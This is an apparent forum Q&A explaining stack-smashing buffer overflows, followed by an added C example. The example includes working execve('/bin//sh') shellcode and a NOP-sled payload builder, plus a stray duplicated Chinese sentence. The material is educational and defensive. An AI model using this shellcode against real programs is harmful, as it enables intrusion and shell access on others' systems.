
Is it possible to invoke a program through another program

I'm reading an article about Buffer Overflow Attack: http://www.cse.scu.edu/~tschwarz/coen152_05/Lectures/BufferOverflow.html
Theoretically I understand what it is talking about.

But I can't imagine how a hacker program could be executed by this kind of attack.
For the example in the article, the function bar is called because of the designed string. However, bar is a function of the same program. In other words, he is hacking himself on purpose. As I know, any address in a program only belongs to itself, meaning that you can't invoke a function of another program through its address.

I just want to know: in real cases, how will a hacker do it?
As it said:

A real attack would try to place the address of the top of the stack in lieu of the return address, followed by some horrible lines of assembly code, such as a call to another tool.

What is "some horrible lines of assembly"? Is there a simple example?

Go read Smashing The Stack For Fun And Profit. It has a specific example for 32-bit x86.


Yes, programs run other programs all the time. E.g. a command shell takes input that you type and runs that program. Or in a GUI, double-clicking on a program runs it. The program that draws the file-manager window and receives your double-clicks is itself a program (or graphical shell).

Anyway, the OS has a system call for starting a new program, and by getting enough control to run a small amount of code in the process you're attacking, you (the attacker) can invoke that system call with args to start whatever program you want on the remote computer.

Often you'd choose args like /bin/sh (the Unix shell). Depending on context, its input might still be connected to the network socket you used to send the exploit payload. (Often called "shellcode", because the typical exploit goal is to invoke a shell. Although the term is now more generic, and applies to any executable machine code exploit payload, especially when formatted as a string. Usually this means avoiding any 0 bytes in the machine code.)


As I know, any address in a program only belongs to itself, meaning that you can't invoke a function of another program through its address.

Data is code, code is data. As soon as your exploit payload (i.e. machine code) is read into memory by the process you're attacking, it has an address in the target process.

The simplest kinds of buffer overflows include code and data that overwrites the return address of a function, so the function returns to the exploit payload instead of to its caller. This is the classic stack-smashing attack for buffers allocated on the call stack, like char buf[16]; // nobody ever types more than 16 digit numbers, right? inside a function.

From that page, you already know how an attacker can take control of the return address with a buffer overflow. 从该页面,您已经知道攻击者如何利用缓冲区溢出来控制返回地址。

Things like non-executable memory, e.g. W^X (either write or exec, not both), and ASLR (address-space layout randomization), are both designed to defeat this sort of attack. If stack addresses are randomized, it might take a lot of tries before you manage to get the return address to land inside a bunch of NOPs (a "nop sled") in your exploit payload.
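The following is an added example, not code from the question, the answer, or the linked article. It puts the pieces of this answer side by side for 32-bit Linux x86: the `char buf[16]` bug, a bounded copy that rejects oversized input, the "horrible lines of assembly" (an execve("/bin//sh") system call as a NUL-free byte string), and the classic payload layout of NOP sled, shellcode and a repeated little-endian return address. It only builds and inspects the payload in memory; it never runs the shellcode, and on any system with W^X or ASLR the layout would not work as-is. The frame distance (32 bytes) and the stack addresses (0xbffffa40 and similar) are hypothetical numbers chosen for illustration.

```c
/* Added example (not from the original page). 32-bit Linux x86 assumed for
 * the shellcode; the numeric offsets and addresses are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The bug from the answer: a 16-byte stack buffer filled with no length
 * check. Kept for comparison only; never call it with untrusted input. */
void vulnerable(const char *input)
{
    char buf[16]; /* nobody ever types more than 16 digit numbers, right? */
    strcpy(buf, input);
    puts(buf);
}

/* Hardened form: bound the copy to the destination and reject oversized
 * input instead of overflowing or silently truncating. 0 = ok, -1 = rejected. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* The "horrible lines of assembly": execve("/bin//sh", {"/bin//sh", NULL}, NULL)
 * through int 0x80 on 32-bit Linux. Every byte is non-zero, so strcpy()/gets()
 * copy it whole; "/bin//sh" is 8 bytes so it fits in two pushes with no NUL. */
static const uint8_t shellcode[] =
    "\x31\xc0"      /* xor  eax, eax     ; eax = 0                          */
    "\x31\xd2"      /* xor  edx, edx     ; envp = NULL                      */
    "\x50"          /* push eax          ; string terminator                */
    "\x68//sh"      /* push 0x68732f2f   ; "//sh"                           */
    "\x68/bin"      /* push 0x6e69622f   ; "/bin" -> "/bin//sh\0" on stack  */
    "\x89\xe3"      /* mov  ebx, esp     ; ebx = filename                   */
    "\x50"          /* push eax          ; argv[1] = NULL                   */
    "\x53"          /* push ebx          ; argv[0] = filename               */
    "\x89\xe1"      /* mov  ecx, esp     ; ecx = argv                       */
    "\xb0\x0b"      /* mov  al, 11       ; __NR_execve                      */
    "\xcd\x80";     /* int  0x80                                            */
#define SHELLCODE_LEN (sizeof shellcode - 1)   /* 25 bytes, string NUL excluded */

uint8_t demo_payload[256];   /* scratch buffer for the payload below */

/* Classic layout: [NOP sled][shellcode][ret_addr x n_ret_copies].
 * dist_to_ret is the hypothetical distance from buf[0] to the saved return
 * address (buffer + padding + saved EBP). Returns payload length, 0 on error. */
size_t build_payload(uint8_t *out, size_t out_cap, size_t dist_to_ret,
                     uint32_t ret_addr, size_t n_ret_copies)
{
    size_t total = dist_to_ret + 4 * n_ret_copies;
    if (dist_to_ret < SHELLCODE_LEN || total + 1 > out_cap)
        return 0;
    size_t sled = dist_to_ret - SHELLCODE_LEN;
    memset(out, 0x90, sled);                      /* 0x90 = NOP: the "nop sled" */
    memcpy(out + sled, shellcode, SHELLCODE_LEN);
    for (size_t i = 0; i < n_ret_copies; i++) {   /* little-endian address, repeated */
        uint8_t *p = out + dist_to_ret + 4 * i;
        p[0] = (uint8_t)(ret_addr);
        p[1] = (uint8_t)(ret_addr >> 8);
        p[2] = (uint8_t)(ret_addr >> 16);
        p[3] = (uint8_t)(ret_addr >> 24);
    }
    out[total] = '\0';
    return total;
}

/* A payload delivered as a C string must contain no 0x00 before its end,
 * or the copy stops early and the return address is never reached. */
int payload_has_nul(const uint8_t *p, size_t len)
{
    return memchr(p, 0, len) != NULL;
}

/* Does the guessed return address land anywhere from the first NOP up to the
 * first shellcode byte, given where buf[0] actually is? With ASLR, buf_addr
 * changes per run, which is why the answer says it may take many tries. */
int ret_lands_in_sled(uint32_t buf_addr, size_t dist_to_ret, uint32_t ret_addr)
{
    uint32_t sled_end = buf_addr + (uint32_t)(dist_to_ret - SHELLCODE_LEN);
    return ret_addr >= buf_addr && ret_addr <= sled_end;
}

int main(void)
{
    size_t n = build_payload(demo_payload, sizeof demo_payload, 32, 0xbffffa40u, 4);
    printf("payload: %zu bytes, contains NUL: %s\n", n,
           payload_has_nul(demo_payload, n) ? "yes" : "no");
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", demo_payload[i], (i + 1) % 16 ? " " : "\n");
    putchar('\n');
    return 0;
}
```

Run it and you see seven 0x90 bytes, the 25 shellcode bytes, then `40 fa ff bf` four times: with the hypothetical frame, buf[0] at 0xbffffa40 and that guess, the overwritten return address points into the sled and execution slides into the execve call. The same harness shows why the answer's mitigations matter: `ret_lands_in_sled` fails as soon as the real buffer address moves by more than the sled length, and with W^X the sled is not executable at all, so a modern exploit has to reuse existing code rather than inject its own.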

